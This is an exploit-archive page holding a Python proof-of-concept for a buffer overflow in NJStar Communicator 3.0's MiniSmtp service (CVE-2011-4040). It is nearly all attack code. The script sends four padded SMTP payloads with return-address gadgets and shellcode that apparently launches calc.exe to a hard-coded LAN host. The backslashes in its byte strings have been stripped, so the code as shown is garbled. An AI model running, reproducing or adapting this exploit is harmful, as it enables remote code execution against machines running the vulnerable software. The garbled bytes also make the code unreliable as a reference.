Home / exploits NJStar Communicator 3.0 MiniSmtp Buffer Overflow
Posted on 03 December 2011
# Exploit Title: NJStart Communicator MiniSmtp Buffer Overflow [ASLR Bypass] # Date: 02/12/11 # Author: Zune - Julian Pulido # Software Link: http://www.njstar.com/download/njcom.exe # Version: 3.0 # Build: 11818 and previous # Tested on: Windows 7 Ultimate # CVE:2011-4040 #! /usr/local/bin/python import socket import time carriage= chr(0xd) ####################################### Padding1= chr(0x31)* 275 Jump= 'x8dx44x24x80xffxe0x90x90' Junk1= chr(0x90)* 4 return1= 'x2dx12x41' # pop retn egg1= Padding1+Jump+Junk1+return1+carriage ####################################### Padding2= chr(0x32)* 271 return2= 'x2bx12x41' # pop pop pop retn egg2= Padding2+return2+carriage ####################################### Padding3= chr(0x33) * 263 return3= 'x2dx12x41' # pop retn egg3= Padding3+return3+carriage ####################################### Padding4= chr(0x34) * 171 Padding5= chr(0x34) * 22 ShellCode = "xC7x43x20x63x61x6Cx63xC7x43x24x2Ex65x78x65x33xC0 x66xB8x1Ax08xC1xE0x08xB0x79x03xE8x8Dx43x20x33xC9xB1x01xC1 xC1x0Cx2BxE1x6Ax05x50xFFxD5x8Dx85x85x44xF8xFFx6Ax01xFFxD0" return4= 'x2bx12x41' # pop pop pop retn egg4= Padding4+ShellCode+Padding5+return4+carriage ####################################### def Send_SMTP (egg): connectionx.send(egg +' ') time.sleep(2) connectionx = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "Exploit NJStar Communicator 3.0 MiniSmtp by Zune " print "Windows 7 Ultimate [ASLR Bypass]" try: connectionx.connect(("192.168.1.65",25))#SMTP port 25 Send_SMTP(egg1) Send_SMTP(egg2) Send_SMTP(egg3) Send_SMTP(egg4) connectionx.close() except socket.error: print "it couldn't connect" time.sleep(2)
